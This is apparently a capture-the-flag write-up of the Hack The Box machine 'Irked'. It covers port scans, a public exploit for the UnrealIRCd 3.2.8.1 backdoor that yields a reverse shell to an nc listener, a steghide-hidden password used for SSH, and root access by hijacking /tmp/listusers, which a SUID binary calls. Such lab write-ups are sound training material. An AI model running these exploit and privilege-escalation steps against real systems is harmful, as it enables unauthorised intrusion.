irked

Feb 27, 2021 TJNull's List
Share on:

irked

Introduction:

Recon

 1eneloop@kinetic:.../hackthebox/irked/data$ sudo nmap -sS -sC -sV -T4 -O -oN nmap.irked.txt 10.10.10.117
 2[sudo] password for eneloop: 
 3Sorry, try again.
 4[sudo] password for eneloop: 
 5Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 15:56 EST
 6Nmap scan report for 10.10.10.117
 7Host is up (0.014s latency).
 8Not shown: 997 closed ports
 9PORT    STATE SERVICE VERSION
1022/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
11| ssh-hostkey: 
12|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
13|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
14|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
15|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
1680/tcp  open  http    Apache httpd 2.4.10 ((Debian))
17|_http-server-header: Apache/2.4.10 (Debian)
18|_http-title: Site doesn't have a title (text/html).
19111/tcp open  rpcbind 2-4 (RPC #100000)
20| rpcinfo: 
21|   program version    port/proto  service
22|   100000  2,3,4        111/tcp   rpcbind
23|   100000  2,3,4        111/udp   rpcbind
24|   100000  3,4          111/tcp6  rpcbind
25|   100000  3,4          111/udp6  rpcbind
26|   100024  1          38381/tcp6  status
27|   100024  1          47765/tcp   status
28|   100024  1          54604/udp6  status
29|_  100024  1          55280/udp   status
30No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
31TCP/IP fingerprint:
32OS:SCAN(V=7.91%E=4%D=2/27%OT=22%CT=1%CU=31312%PV=Y%DS=2%DC=I%G=Y%TM=603AB20
33OS:E%P=x86_64-pc-linux-gnu)SEQ(SP=F2%GCD=2%ISR=111%TI=Z%CI=I%II=I%TS=8)OPS(
34OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
35OS:NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(
36OS:R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
37OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
38OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
39OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
40OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
41OS:S)
42
43Network Distance: 2 hops
44Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
45
46OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
47Nmap done: 1 IP address (1 host up) scanned in 21.95 seconds
48

Scanning target 10.10.10.117 Time started: 2021-02-27 15:56:20.017287

Port 111 is open Port 22 is open Port 80 is open Port 6697 is open Port 8067 is open Port 47765 is open Port 65534 is open Port scan completed in 0:00:07.285612

Apache/2.4.10 (Debian) Server at 10.10.10.117 Port 80

Enumeration

eneloop@kinetic:…/hackthebox/irked/data$ nikto -url http://10.10.10.117

  • Nikto v2.1.6
  • Target IP: 10.10.10.117
  • Target Hostname: 10.10.10.117
  • Target Port: 80
  • Start Time: 2021-02-27 15:58:25 (GMT-5)
  • Server: Apache/2.4.10 (Debian)
  • The anti-clickjacking X-Frame-Options header is not present.
  • The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  • The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  • No CGI Directories found (use ‘-C all’ to force check all possible dirs)
  • Server may leak inodes via ETags, header found with file /, inode: 48, size: 56c2e413aa86b, mtime: gzip
  • Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
  • Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
  • OSVDB-3092: /manual/: Web server manual found.
  • OSVDB-3268: /manual/images/: Directory indexing found.
  • OSVDB-3233: /icons/README: Apache default file found.
  • 7863 requests: 0 error(s) and 9 item(s) reported on remote host
  • End Time: 2021-02-27 16:01:19 (GMT-5) (174 seconds)

eneloop@kinetic:…/hackthebox/irked/data$ nmap -p111,22,80,6697,8067,47765,65534 -sV -sC -T4 -Pn 10.10.10.117 Host discovery disabled (-Pn). All addresses will be marked ‘up’ and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-27 16:03 EST Nmap scan report for 10.10.10.117 Host is up (0.012s latency).

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Site doesn’t have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 38381/tcp6 status | 100024 1 47765/tcp status | 100024 1 54604/udp6 status |_ 100024 1 55280/udp status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 47765/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.41 seconds

eneloop@kinetic:…/hackthebox/irked/data$ irc enel00p 10.10.10.117

*** Connecting to port 6667 of server 10.10.10.117 *** Unable to connect to port 6667 of server 10.10.10.117: connect: Bad file descriptor *** Use /SERVER to connect to a server *** Connecting to port 6697 of server 10.10.10.117 -irked.htb- *** Looking up your hostname… -irked.htb- *** Couldn’t resolve your hostname; using your IP address instead *** Welcome to the ROXnet IRC Network [email protected] (from irked.htb) *** If you have not already done so, please read the new user information with /HELP NEWUSER *** Your host is irked.htb, running version Unreal3.2.8.1 *** This server was created Mon May 14 2018 at 13:12:50 EDT *** umodes available iowghraAsORTVSxNCWqBzvdHtGp, channel modes available lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj *** UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 +TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server *** WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ +CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT +STATUSMSG=~&@%+ :are supported by this server *** EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server *** There are 1 users and 0 invisible on 1 servers *** This server has 1 clients and 0 servers connected *** Current Local Users: 1 Max: 1 *** Current Global Users: 1 Max: 1 *** MOTD File is missing *** Mode change “+iwx” for user enel00p by enel00p *** choices:

*** Channel Users Topic *** Client: ircII 20190117 *** Server irked.htb: Unreal3.2.8.1. FhiXOoE [*=2309] *** UHNAMES NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 +TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 :are supported by this server *** WALLCHOPS WATCH=128 WATCHOPTS=A SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ +CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT +STATUSMSG=~&@%+ :are supported by this server *** EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP are supported by this server [1] 16:15 enel00p (+iw) * type /help for help

Exploitation

https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py

(py3) eneloop@kinetic:…/hackthebox/irked/data$ python ./exploit.py usage: exploit.py [-h] -payload {python,netcat,bash} ip port exploit.py: error: the following arguments are required: ip, port, -payload (py3) eneloop@kinetic:…/hackthebox/irked/data$ python ./exploit.py -payload bash 10.10.10.117 6697 Exploit sent successfully!

eneloop@kinetic:/oscp/tools$ nc -lvnp 4455 listening on [any] 4455 … connect to [10.10.14.38] from (UNKNOWN) [10.10.10.117] 40490 bash: cannot set terminal process group (639): Inappropriate ioctl for device bash: no job control in this shell ircd@irked:~/Unreal3.2$

66 tar cvf - Unreal3.2| gzip >Unreal3.2.tar.gz 67 history ircd@irked:~$ ls ls Unreal3.2 Unreal3.2.tar.gz ircd@irked:~$

Post-exploit/PrivEsc

ircd@irked:/home/djmardov$ ls -l ./Documents/user.txt ls -l ./Documents/user.txt -rw——- 1 djmardov djmardov 33 May 15 2018 ./Documents/user.txt ircd@irked:/home/djmardov$ ls -l ./Documents/.backup ls -l ./Documents/.backup -rw-r–r– 1 djmardov djmardov 52 May 16 2018 ./Documents/.backup ircd@irked:/home/djmardov$ file ./Documents/.backup file ./Documents/.backup ./Documents/.backup: ASCII text ircd@irked:/home/djmardov$ cat ./Documents/.backup cat ./Documents/.backup Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss ircd@irked:/home/djmardov$

(py3) eneloop@kinetic:…/hackthebox/irked/data$ wget http://10.10.10.117/irked.jpg –2021-02-27 17:52:28– http://10.10.10.117/irked.jpg Connecting to 10.10.10.117:80… connected. HTTP request sent, awaiting response… 200 OK Length: 34697 (34K) [image/jpeg] Saving to: ‘irked.jpg’

irked.jpg 100%[=======================================================================>] 33.88K –.-KB/s in 0.01s

2021-02-27 17:52:28 (2.47 MB/s) - ‘irked.jpg’ saved [34697/34697]

(py3) eneloop@kinetic:…/hackthebox/irked/data$ steghide extract -sf irked.jpg Enter passphrase: wrote extracted data to “pass.txt”.

(py3) eneloop@kinetic:…/hackthebox/irked/data$ cat pass.txt Kab6h+m+bbp2J:HG

(py3) eneloop@kinetic:…/tools/PEAS/linPEAS$ ssh [email protected] [email protected]’s password:

The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue May 15 08:56:32 2018 from 10.33.3.3 djmardov@irked:~$ djmardov@irked:~$ cd Documents/ djmardov@irked:~/Documents$ ls user.txt djmardov@irked:~/Documents$ cat user.txt 4aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX8e djmardov@irked:~/Documents$

djmardov@irked:~$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2021-02-27 17:15 (:0) djmardov pts/0 2021-02-27 18:04 (10.10.14.38) sh: 1: /tmp/listusers: not found

djmardov@irked:~$ vi /tmp/listusers djmardov@irked:~$ /bin/sudo^C djmardov@irked:~$ /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2021-02-27 17:15 (:0) djmardov pts/0 2021-02-27 18:04 (10.10.14.38) root@irked:~# cd /root root@irked:/root# ls pass.txt root.txt root@irked:/root# cat pass.txt Kab6h+m+bbp2J:HG root@irked:/root# cat root.txt 8d8XXXXXXXXXXXXXXXXXXXXXXXXXXXf3 root@irked:/root#

From ghidra analysis -

/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */ undefined4 main(void) { puts(“This application is being devleoped to set and test user permissions”); puts(“It is still being actively developed”); system(“who”); setuid(0); system("/tmp/listusers"); return 0; }